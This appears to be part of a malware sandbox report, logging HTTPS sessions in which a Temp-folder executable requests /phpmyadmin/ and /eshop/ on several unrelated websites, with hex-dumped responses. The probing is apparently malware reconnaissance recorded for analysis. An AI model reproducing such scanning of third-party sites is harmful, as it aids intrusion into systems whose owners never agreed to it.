                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC178INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                72192.168.2.454416164.46.121.634435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: s-kotobuki-s.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC269INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Mar 2020 06:02:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "415-5a17f6251cd80"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 1045
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab ef bc 88 55 52 4c ef bc 89 e3 81 8c e3 81 bf e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 7a 65 6e 6c 6f 67 69 63 5f 70 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> 404 Not Found URL</title> <link rel="stylesheet" href="/zenlogic_pa


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                73192.168.2.45411346.229.230.1074435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: reproma.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC187INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                74192.168.2.45436492.240.253.144435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: instalanova.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC138INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                75192.168.2.45460037.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC165OUTGET /eshop/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC636INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Link: <https://kanapy.sk/eshop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                Link: <https://kanapy.sk/eshop/wp-json/wp/v2/pages/520>; rel="alternate"; type="application/json"
                                                                                                                                                                                                                                                                                                                                Link: <https://wp.me/P9Py1F-8o>; rel=shortlink
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Set-Cookie: mailchimp_landing_site=https%3A%2F%2Fkanapy.sk%2Feshop%2Feshop%2F; expires=Thu, 18-Jan-2024 04:03:30 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC3460INData Raw: 31 63 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1c77<!DOCTYPE html><html lang="sk-SK"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://kanapy.sk/eshop/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 35 34 46 2d 32 35 46 31 31 33 43 42 43 31 30 32 2e 6a 70 65 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 35 2f 39 39 46 36 34 45 43 37 2d 31 43 37 41 2d 34 30 38 35 2d 41 35 34 46 2d 32 35 46 31 31 33 43 42 43 31 30 32 2e 6a 70 65 67 22 2c 22 77 69 64 74 68 22 3a 31 35 30 30 2c 22 68 65 69 67 68 74 22 3a 31 30 30 30 2c 22 63 61 70 74 69 6f 6e 22 3a 22 53 68 6f 77 72 6f 6f 6d 20 4b 61 6e 61 70 79 20 69 6e 74 65 72 69 c3 a9 72 20 76 20 54 72 6e 61 76 65 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: 54F-25F113CBC102.jpeg","contentUrl":"https://kanapy.sk/eshop/wp-content/uploads/2022/05/99F64EC7-1C7A-4085-A54F-25F113CBC102.jpeg","width":1500,"height":1000,"caption":"Showroom Kanapy interir v Trnave"},{"@type":"BreadcrumbList","@id":"https://kanapy.s
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77
                                                                                                                                                                                                                                                                                                                                Data Ascii: napy.sk/eshop/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /><style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--w
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 72 61 70 3a 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: rap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-blui
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: nt-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.ha
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 6f 64 75 63 74 2d 6c 69 73 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 77 6f 6f 2d 77 69 64 67 65 74 2d 70 72 6f 64 75 63 74 2d 6c 69 73 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 37 2e 31 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 77 69 64 67 65 74 2d 73 6c 69 64 65 72 2d 70 72 69 63 65 2d 66 69 6c 74 65 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: oduct-list-css' href='https://kanapy.sk/eshop/wp-content/themes/woodmart/css/parts/woo-widget-product-list.min.css?ver=7.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-widget-slider-price-filter-css' href='https://kanapy.sk/eshop/wp-con
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 68 65 61 64 65 72 2d 63 61 72 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 68 65 61 64 65 72 2d 65 6c 2d 63 61 72 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 37 2e 31 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 77 69 64 67 65 74 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: ='all' /><link rel='stylesheet' id='wd-header-cart-css' href='https://kanapy.sk/eshop/wp-content/themes/woodmart/css/parts/header-el-cart.min.css?ver=7.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-widget-shopping-cart-css' href='http
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 5f 68 69 64 65 22 3a 22 35 30 30 22 2c 22 61 6e 69 6d 61 74 65 5f 73 70 65 65 64 5f 73 68 6f 77 22 3a 22 35 30 30 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 23 38 31 64 37 34 32 22 2c 22 62 6f 72 64 65 72 22 3a 22 23 62 31 61 36 61 36 63 32 22 2c 22 62 6f 72 64 65 72 5f 6f 6e 22 3a 22 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 22 3a 22 23 36 31 61 32 32 39 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 22 3a 22 23 34 65 38 32 32 31 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 6c 69 6e 6b 5f 63 6f 6c 6f 75 72 22 3a 22 23 66 66 66 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 6e 65 77 5f 77 69 6e 22 3a 22 22 2c 22 62 75 74 74 6f 6e 5f 32 5f
                                                                                                                                                                                                                                                                                                                                Data Ascii: _hide":"500","animate_speed_show":"500","background":"#81d742","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#61a229","button_1_button_hover":"#4e8221","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 78 6d 6c 72 70 63 2e 70 68 70 3f 72 73 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 77 6c 77 6d 61 6e 69 66 65 73 74 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 77 6c 77 6d 61 6e 69 66 65 73 74 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 77 6c 77 6d 61 6e 69 66 65 73 74 2e 78 6d 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 36 2e 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: cation/rsd+xml" title="RSD" href="https://kanapy.sk/eshop/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://kanapy.sk/eshop/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 6.1" /><meta n
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC4096INData Raw: 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 09 0d 0a 09 09 09 09 74 72 79 20 7b 09 09 09 09 09 09 09 09 0d 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0d 0a 09 09 09 09 09 09 6e 65 77 68 3b 0d 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 3f 20 77 69 6e 64 6f 77 2e 52 53 49 57 20 3a 20 70 77 3b 0d 0a 09 09 09 09 09 65 2e 74 61 62 77 20 3d 20 65 2e 74 61 62 77 3d 3d 3d 75 6e 64 65 66 69 6e 65 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: ow.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 || isNaN(pw) ? window.RSIW : pw;e.tabw = e.tabw===undefined


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                76192.168.2.45460137.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC165OUTGET /eshop/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC636INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Link: <https://kanapy.sk/eshop/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                Link: <https://kanapy.sk/eshop/wp-json/wp/v2/pages/520>; rel="alternate"; type="application/json"
                                                                                                                                                                                                                                                                                                                                Link: <https://wp.me/P9Py1F-8o>; rel=shortlink
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Set-Cookie: mailchimp_landing_site=https%3A%2F%2Fkanapy.sk%2Feshop%2Feshop%2F; expires=Thu, 18-Jan-2024 04:03:30 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC3460INData Raw: 31 63 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1c77<!DOCTYPE html><html lang="sk-SK"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://kanapy.sk/eshop/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode
